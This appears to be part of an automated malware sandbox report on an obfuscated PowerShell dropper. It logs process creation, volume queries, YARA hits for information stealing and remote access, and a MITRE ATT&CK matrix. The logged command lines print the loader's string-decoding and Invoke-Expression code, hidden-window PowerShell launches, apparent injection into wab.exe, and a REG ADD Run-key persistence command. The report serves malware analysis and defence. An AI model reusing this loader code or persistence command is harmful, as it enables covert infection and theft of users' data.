DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.iN Ddse.rdltOver.Ori,SDi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "write 'Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser Reactualizations rentvisten Exploder gawkihood urtesupper Indstrmme Guitars147 Acuity Trvaren Talefrihed Aktivitetspdagogikker Ubehjlpsommes Moutler Croise178 Mandigt Blindtarmsoperation Laeder titre Beskyttelsens Fremmedsprogene Lyrists7 Afgr Caesaropapacy Overskriftsstrrelser';If (${host}.CurrentCulture) {$Afiklingshastighed++;}$Papirindfringen51='SUBsTR';$Papirindfringen51+='ing';Function Oktantals($Maaleresultatet){$Fuldskggets=$Maaleresultatet.Length-$Afiklingshastighed;For( $Hypergamously=4;$Hypergamously -lt $Fuldskggets;$Hypergamously+=5){$Reactualizations+=$Maaleresultatet.$Papirindfringen51.Invoke( $Hypergamously, $Afiklingshastighed);}$Reactualizations;}function Oncogenes($Flirtigig){ & ($eksileredes) ($Flirtigig);}$Klagefrist=Oktantals ' RatMSeptoKrimzBilsi,adilIscelCreaaPort/Ud.e5tr.o.Dagu0 Bje B.rd( EjeWRa,ni A,tnBlyad teloLympwScrusGalv EddNe itTV ks Indu1File0Guri.Sdek0 san;Egyp KatdWC.rniSensn Cas6 em4.ogi;Tylv ForxF mm6Spor4Teq ;Ka c DelfrInfovMo e:Myop1Brys2Kura1 wag.Tils0Sund).ipp redGCance TobcSjusk U,do Fly/Unsc2Prot0Homo1Raak0T.ni0Blus1afgu0.syk1 Um, U,pFGlycihoveruartedanif havoBassxOver/Tilb1Komm2Scam1Din .hyld0Init ';$Morvin=Oktantals 'TeksU ValsBrace Wi rEuro-ArgeAMaalgSkvueDok,n TimtMod. ';$urtesupper=Oktantals 'Cocih undt fjet SerpH rksTalw:Ens./Kurv/Semie UdkcKlbeo StrnVogts ColtGeomrBehoa Hj.m.lndeServdCowhi.oteaEnke.Bar cLeveoEmptmBrim/S.anSKon,aGl,nmDe,asNonzeForsnNo,rd BareCurv. 
DagjC evpNebub,oth ';$Dvelreres=Oktantals ' P o>wood ';$eksileredes=Oktantals 'Avi,iglyceAfk,xP,ra ';$Synecologic='Acuity';$Flagknap = Oktantals 'Sekre prvc ,odh IndoChou Sk.t%BlipaBru pEksppNo idD.koaOp.rtRomaa Rim%Reex\del,NSed.eInvedMov p PecrDiskiOutdoFiskrEndoi N,nt,ttaeVestrSicae.ebonFa,ddL gteSu o2U,as0K,es0Dogm.RetySundiiDra.g Dis isot&,ota&Rutt MedbeFlotcProxhDowco.las Indst cr ';Oncogenes (Oktantals 'Abol$Divegkaf lConvo,lgpb.ejmaSalgl Oli:E.seM Cenb NumeShirl KrapBespoAmnilMe,tiDagstKonsu F grGig.eModurM,lj=Af.u(DovecFremmObted.hak Tvan/F.rfcEole o v$.eldF UnmltegmaMut.gParckVetenEgetaItc pCons)Korr ');Oncogenes (Oktantals ',epr$ordsg evelCanioLevub ela,nrilAndr: Balg oinaRekrwtudskPartiUndihRe,soBl,doScatdAort=Brev$ GenuTiturAntetPreseBrans MacuomfapElskpLflaerestrV va.FirlsmisppHelslneuti tyvtScra(Vege$ MjeDRe.uvExtreSc,elbudgrUndeeKapirBe.eePe isF.ed)S,dh ');Oncogenes (Oktantals 'Kono[civiNAffleS.lvtGabi.TenoSTor eRyonrStrevNe kiZy,oc Auge M,sP FakoKariiEkphncr,ttAvenM Me.aAssunTimea impgDetae pndrAfd ]Pist: Sli:st.rSEn oe strcWichuKontr Pr.i Af,tG oby UfoP tilrDatao Hayt Bleo Ba.cTeleo EnelSkri Fo r=Stop Udd[Ba.
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Nedprioriterende200.Sig && echo t"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Scleroconjunctival" /t REG_EXPAND_SZ /d "%Ulykkesfugles% -w 1 $Cigaretetuiernes=(Get-ItemProperty -Path 'HKCU:\Indfindendes\').Storborgernes;%Ulykkesfugles% ($Cigaretetuiernes)"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser';if (${host}.currentculture) {$afiklingshastighed++;}$papirindfringen51='substr';$papirindfringen51+='ing';function oktantals($maaleresultatet){$fuldskggets=$maaleresultatet.length-$afiklingshastighed;for( $hypergamously=4;$hypergamously -lt $fuldskggets;$hypergamously+=5){$reactualizations+=$maaleresultatet.$papirindfringen51.invoke( $hypergamously, $afiklingshastighed);}$reactualizations;}function oncogenes($flirtigig){ & ($eksileredes) ($flirtigig);}$klagefrist=oktantals ' ratmseptokrimzbilsi,adiliscelcreaaport/ud.e5tr.o.dagu0 bje b.rd( ejewra,ni a,tnblyad telolympwscrusgalv eddne ittv ks indu1file0guri.sdek0 san;egyp katdwc.rnisensn cas6 em4.ogi;tylv forxf mm6spor4teq ;ka c delfrinfovmo e:myop1brys2kura1 wag.tils0sund).ipp redgcance tobcsjusk u,do fly/unsc2prot0homo1raak0t.ni0blus1afgu0.syk1 um, u,pfglycihoveruartedanif havobassxover/tilb1komm2scam1din .hyld0init ';$morvin=oktantals 'teksu valsbrace wi reuro-argeamaalgskvuedok,n timtmod. ';$urtesupper=oktantals 'cocih undt fjet serph rkstalw:ens./kurv/semie udkcklbeo strnvogts coltgeomrbehoa hj.m.lndeservdcowhi.oteaenke.bar cleveoemptmbrim/s.anskon,agl,nmde,asnonzeforsnno,rd barecurv. 
dagjc evpnebub,oth ';$dvelreres=oktantals ' p o>wood ';$eksileredes=oktantals 'avi,iglyceafk,xp,ra ';$synecologic='acuity';$flagknap = oktantals 'sekre prvc ,odh indochou sk.t%blipabru peksppno idd.koaop.rtromaa rim%reex\del,nsed.einvedmov p pecrdiskioutdofiskrendoi n,nt,ttaevestrsicae.ebonfa,ddl gtesu o2u,as0k,es0dogm.retysundiidra.g dis isot&,ota&rutt medbeflotcproxhdowco.las indst cr ';oncogenes (oktantals 'abol$divegkaf lconvo,lgpb.ejmasalgl oli:e.sem cenb numeshirl krapbespoamnilme,tidagstkonsu f grgig.emodurm,lj=af.u(dovecfremmobted.hak tvan/f.rfceole o v$.eldf unmltegmamut.gparckvetenegetaitc pcons)korr ');oncogenes (oktantals ',epr$ordsg evelcaniolevub ela,nrilandr: balg oinarekrwtudskpartiundihre,sobl,doscatdaort=brev$ genutiturantetpresebrans macuomfapelskplflaerestrv va.firlsmispphelslneuti tyvtscra(vege$ mjedre.uvextresc,elbudgrundeekapirbe.eepe isf.ed)s,dh ');oncogenes (oktantals 'kono[civinaffles.lvtgabi.tenostor eryonrstrevne kizy,oc auge m,sp fakokariiekphncr,ttavenm me.aassuntimea impgdetae pndrafd ]pist: sli:st.rsen oe strcwichukontr pr.i af,tg oby ufop tilrdatao hayt bleo ba.cteleo enelskri fo r=stop udd[ba.in ddse.rdltover.ori,sdi
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "write 'reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser';if (${host}.currentculture) {$afiklingshastighed++;}$papirindfringen51='substr';$papirindfringen51+='ing';function oktantals($maaleresultatet){$fuldskggets=$maaleresultatet.length-$afiklingshastighed;for( $hypergamously=4;$hypergamously -lt $fuldskggets;$hypergamously+=5){$reactualizations+=$maaleresultatet.$papirindfringen51.invoke( $hypergamously, $afiklingshastighed);}$reactualizations;}function oncogenes($flirtigig){ & ($eksileredes) ($flirtigig);}$klagefrist=oktantals ' ratmseptokrimzbilsi,adiliscelcreaaport/ud.e5tr.o.dagu0 bje b.rd( ejewra,ni a,tnblyad telolympwscrusgalv eddne ittv ks indu1file0guri.sdek0 san;egyp katdwc.rnisensn cas6 em4.ogi;tylv forxf mm6spor4teq ;ka c delfrinfovmo e:myop1brys2kura1 wag.tils0sund).ipp redgcance tobcsjusk u,do fly/unsc2prot0homo1raak0t.ni0blus1afgu0.syk1 um, u,pfglycihoveruartedanif havobassxover/tilb1komm2scam1din .hyld0init ';$morvin=oktantals 'teksu valsbrace wi reuro-argeamaalgskvuedok,n timtmod. ';$urtesupper=oktantals 'cocih undt fjet serph rkstalw:ens./kurv/semie udkcklbeo strnvogts coltgeomrbehoa hj.m.lndeservdcowhi.oteaenke.bar cleveoemptmbrim/s.anskon,agl,nmde,asnonzeforsnno,rd barecurv. 
dagjc evpnebub,oth ';$dvelreres=oktantals ' p o>wood ';$eksileredes=oktantals 'avi,iglyceafk,xp,ra ';$synecologic='acuity';$flagknap = oktantals 'sekre prvc ,odh indochou sk.t%blipabru peksppno idd.koaop.rtromaa rim%reex\del,nsed.einvedmov p pecrdiskioutdofiskrendoi n,nt,ttaevestrsicae.ebonfa,ddl gtesu o2u,as0k,es0dogm.retysundiidra.g dis isot&,ota&rutt medbeflotcproxhdowco.las indst cr ';oncogenes (oktantals 'abol$divegkaf lconvo,lgpb.ejmasalgl oli:e.sem cenb numeshirl krapbespoamnilme,tidagstkonsu f grgig.emodurm,lj=af.u(dovecfremmobted.hak tvan/f.rfceole o v$.eldf unmltegmamut.gparckvetenegetaitc pcons)korr ');oncogenes (oktantals ',epr$ordsg evelcaniolevub ela,nrilandr: balg oinarekrwtudskpartiundihre,sobl,doscatdaort=brev$ genutiturantetpresebrans macuomfapelskplflaerestrv va.firlsmispphelslneuti tyvtscra(vege$ mjedre.uvextresc,elbudgrundeekapirbe.eepe isf.ed)s,dh ');oncogenes (oktantals 'kono[civinaffles.lvtgabi.tenostor eryonrstrevne kizy,oc auge m,sp fakokariiekphncr,ttavenm me.aassuntimea impgdetae pndrafd ]pist: sli:st.rsen oe strcwichukontr pr.i af,tg oby ufop tilrdatao hayt bleo ba.cteleo enelskri fo r=stop udd[ba.
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "scleroconjunctival" /t reg_expand_sz /d "%ulykkesfugles% -w 1 $cigaretetuiernes=(get-itemproperty -path 'hkcu:\indfindendes\').storborgernes;%ulykkesfugles% ($cigaretetuiernes)"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "write 'reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser';if (${host}.currentculture) {$afiklingshastighed++;}$papirindfringen51='substr';$papirindfringen51+='ing';function oktantals($maaleresultatet){$fuldskggets=$maaleresultatet.length-$afiklingshastighed;for( $hypergamously=4;$hypergamously -lt $fuldskggets;$hypergamously+=5){$reactualizations+=$maaleresultatet.$papirindfringen51.invoke( $hypergamously, $afiklingshastighed);}$reactualizations;}function oncogenes($flirtigig){ & ($eksileredes) ($flirtigig);}$klagefrist=oktantals ' ratmseptokrimzbilsi,adiliscelcreaaport/ud.e5tr.o.dagu0 bje b.rd( ejewra,ni a,tnblyad telolympwscrusgalv eddne ittv ks indu1file0guri.sdek0 san;egyp katdwc.rnisensn cas6 em4.ogi;tylv forxf mm6spor4teq ;ka c delfrinfovmo e:myop1brys2kura1 wag.tils0sund).ipp redgcance tobcsjusk u,do fly/unsc2prot0homo1raak0t.ni0blus1afgu0.syk1 um, u,pfglycihoveruartedanif havobassxover/tilb1komm2scam1din .hyld0init ';$morvin=oktantals 'teksu valsbrace wi reuro-argeamaalgskvuedok,n timtmod. ';$urtesupper=oktantals 'cocih undt fjet serph rkstalw:ens./kurv/semie udkcklbeo strnvogts coltgeomrbehoa hj.m.lndeservdcowhi.oteaenke.bar cleveoemptmbrim/s.anskon,agl,nmde,asnonzeforsnno,rd barecurv. 
dagjc evpnebub,oth ';$dvelreres=oktantals ' p o>wood ';$eksileredes=oktantals 'avi,iglyceafk,xp,ra ';$synecologic='acuity';$flagknap = oktantals 'sekre prvc ,odh indochou sk.t%blipabru peksppno idd.koaop.rtromaa rim%reex\del,nsed.einvedmov p pecrdiskioutdofiskrendoi n,nt,ttaevestrsicae.ebonfa,ddl gtesu o2u,as0k,es0dogm.retysundiidra.g dis isot&,ota&rutt medbeflotcproxhdowco.las indst cr ';oncogenes (oktantals 'abol$divegkaf lconvo,lgpb.ejmasalgl oli:e.sem cenb numeshirl krapbespoamnilme,tidagstkonsu f grgig.emodurm,lj=af.u(dovecfremmobted.hak tvan/f.rfceole o v$.eldf unmltegmamut.gparckvetenegetaitc pcons)korr ');oncogenes (oktantals ',epr$ordsg evelcaniolevub ela,nrilandr: balg oinarekrwtudskpartiundihre,sobl,doscatdaort=brev$ genutiturantetpresebrans macuomfapelskplflaerestrv va.firlsmispphelslneuti tyvtscra(vege$ mjedre.uvextresc,elbudgrundeekapirbe.eepe isf.ed)s,dh ');oncogenes (oktantals 'kono[civinaffles.lvtgabi.tenostor eryonrstrevne kizy,oc auge m,sp fakokariiekphncr,ttavenm me.aassuntimea impgdetae pndrafd ]pist: sli:st.rsen oe strcwichukontr pr.i af,tg oby ufop tilrdatao hayt bleo ba.cteleo enelskri fo r=stop udd[ba.in ddse.rdltover.ori,sdiJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "write 'reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser reactualizations rentvisten exploder gawkihood urtesupper indstrmme guitars147 acuity trvaren talefrihed aktivitetspdagogikker ubehjlpsommes moutler croise178 mandigt blindtarmsoperation laeder titre beskyttelsens fremmedsprogene lyrists7 afgr caesaropapacy overskriftsstrrelser';if (${host}.currentculture) {$afiklingshastighed++;}$papirindfringen51='substr';$papirindfringen51+='ing';function oktantals($maaleresultatet){$fuldskggets=$maaleresultatet.length-$afiklingshastighed;for( $hypergamously=4;$hypergamously -lt $fuldskggets;$hypergamously+=5){$reactualizations+=$maaleresultatet.$papirindfringen51.invoke( $hypergamously, $afiklingshastighed);}$reactualizations;}function oncogenes($flirtigig){ & ($eksileredes) ($flirtigig);}$klagefrist=oktantals ' ratmseptokrimzbilsi,adiliscelcreaaport/ud.e5tr.o.dagu0 bje b.rd( ejewra,ni a,tnblyad telolympwscrusgalv eddne ittv ks indu1file0guri.sdek0 san;egyp katdwc.rnisensn cas6 em4.ogi;tylv forxf mm6spor4teq ;ka c delfrinfovmo e:myop1brys2kura1 wag.tils0sund).ipp redgcance tobcsjusk u,do fly/unsc2prot0homo1raak0t.ni0blus1afgu0.syk1 um, u,pfglycihoveruartedanif havobassxover/tilb1komm2scam1din .hyld0init ';$morvin=oktantals 'teksu valsbrace wi reuro-argeamaalgskvuedok,n timtmod. ';$urtesupper=oktantals 'cocih undt fjet serph rkstalw:ens./kurv/semie udkcklbeo strnvogts coltgeomrbehoa hj.m.lndeservdcowhi.oteaenke.bar cleveoemptmbrim/s.anskon,agl,nmde,asnonzeforsnno,rd barecurv. 
dagjc evpnebub,oth ';$dvelreres=oktantals ' p o>wood ';$eksileredes=oktantals 'avi,iglyceafk,xp,ra ';$synecologic='acuity';$flagknap = oktantals 'sekre prvc ,odh indochou sk.t%blipabru peksppno idd.koaop.rtromaa rim%reex\del,nsed.einvedmov p pecrdiskioutdofiskrendoi n,nt,ttaevestrsicae.ebonfa,ddl gtesu o2u,as0k,es0dogm.retysundiidra.g dis isot&,ota&rutt medbeflotcproxhdowco.las indst cr ';oncogenes (oktantals 'abol$divegkaf lconvo,lgpb.ejmasalgl oli:e.sem cenb numeshirl krapbespoamnilme,tidagstkonsu f grgig.emodurm,lj=af.u(dovecfremmobted.hak tvan/f.rfceole o v$.eldf unmltegmamut.gparckvetenegetaitc pcons)korr ');oncogenes (oktantals ',epr$ordsg evelcaniolevub ela,nrilandr: balg oinarekrwtudskpartiundihre,sobl,doscatdaort=brev$ genutiturantetpresebrans macuomfapelskplflaerestrv va.firlsmispphelslneuti tyvtscra(vege$ mjedre.uvextresc,elbudgrundeekapirbe.eepe isf.ed)s,dh ');oncogenes (oktantals 'kono[civinaffles.lvtgabi.tenostor eryonrstrevne kizy,oc auge m,sp fakokariiekphncr,ttavenm me.aassuntimea impgdetae pndrafd ]pist: sli:st.rsen oe strcwichukontr pr.i af,tg oby ufop tilrdatao hayt bleo ba.cteleo enelskri fo r=stop udd[ba.Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe | Process created: C:\Windows\SysWOW64\cmd.exe "c:\windows\system32\cmd.exe" /c reg add hkcu\software\microsoft\windows\currentversion\run /f /v "scleroconjunctival" /t reg_expand_sz /d "%ulykkesfugles% -w 1 $cigaretetuiernes=(get-itemproperty -path 'hkcu:\indfindendes\').storborgernes;%ulykkesfugles% ($cigaretetuiernes)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation

            Stealing of Sensitive Information

Source: Yara match | File source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

            Remote Access Functionality

Source: Yara match | File source: 0000000A.00000002.2397610990.0000000002F60000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques listed per tactic column; a number in front of a technique name is the signature count shown in the report)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 1 Windows Management Instrumentation; 21 Command and Scripting Interpreter; 1 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Scripting; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 111 Process Injection; 1 Registry Run Keys / Startup Folder; 1 DLL Side-Loading; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
